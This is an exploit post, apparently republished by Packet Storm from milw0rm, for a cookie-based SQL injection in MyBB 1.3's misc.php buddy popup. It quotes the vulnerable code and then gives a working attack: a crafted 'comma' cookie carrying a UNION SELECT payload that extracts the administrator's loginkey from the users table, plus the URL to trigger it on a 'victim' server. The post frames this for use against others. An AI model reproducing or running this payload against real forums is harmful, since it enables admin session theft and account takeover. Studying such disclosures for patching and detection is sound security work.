MyBB version 1.3 is susceptible to SQL injection attacks via a malformed user supplied cookie.
18ffdf10dbf996184c334f55fac8e48cecf411f8eaafe1c5935a5b891df589f8MyBB New SQL Injection
D3vil-0x1 < Devil-00 >
Milw0rm ID :-
http://www.milw0rm.com/auth.php?id=1320
The Inf.File :-
misc.php
Linez :-
[code]
$buddies = $mybb->user['buddylist'];
$namesarray = explode(",",$buddies);
if(is_array($namesarray))
{
while(list($key, $buddyid) = each($namesarray))
{
$sql .= "$comma'$buddyid'"; <== HERE :) Uncleard Var !!
$comma = ",";
}
$timecut = time() - $mybb->settings['wolcutoff'];
$query = $db->query("SELECT u.*, g.canusepms FROM ".TABLE_PREFIX."users u LEFT JOIN ".TABLE_PREFIX."usergroups g ON (g.gid=u.usergroup) WHERE u.uid IN ($sql)");
[/code]
>From 255 to 265
The GLOBALS unset function .. do not unset $_COOKIES ..
then u can start attacking any var by cookies :)
Tested MyBB 1.3 .. Register_Globals = On
Explorer Exploit :-
1- Login by any username ..
2- Create new cookie (
name => "comma"
value => "comma=0)%20%3C%3E%200%20UNION%20ALL%20SELECT%201,loginkey,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,1 FROM mybb_users WHERE uid=1/*"
)
3- Check The URL :-
HOST/PATH/misc.php?action=buddypopup
Where HOST = The Vic.Server And PATH = MyBB Dir.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed